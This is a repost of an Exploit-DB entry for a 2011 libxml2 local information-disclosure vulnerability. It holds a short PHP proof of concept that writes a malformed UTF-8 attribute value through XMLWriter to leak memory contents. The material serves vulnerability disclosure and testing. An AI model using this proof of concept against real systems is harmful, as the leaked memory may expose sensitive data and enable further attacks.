- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35252
- Проверка EDB
-
- Пройдено
- Автор
- KEES COOK
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2011-01-24
PHP:
source: https://www.securityfocus.com/bid/45973/info
The 'libxml2' library is prone to a local information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
# Copyright 2010, Canonical, Ltd.
# Author: Kees Cook <[email protected]>
# License: GPLv3
#
# Proof-of-concept memory content leak
$xw = new XMLWriter();
$xw->openURI('php://output');
$xw->startElement('input');
$xw->writeAttribute('value', "\xe0\x81");
$xw->endElement();
?>- Источник
- www.exploit-db.com
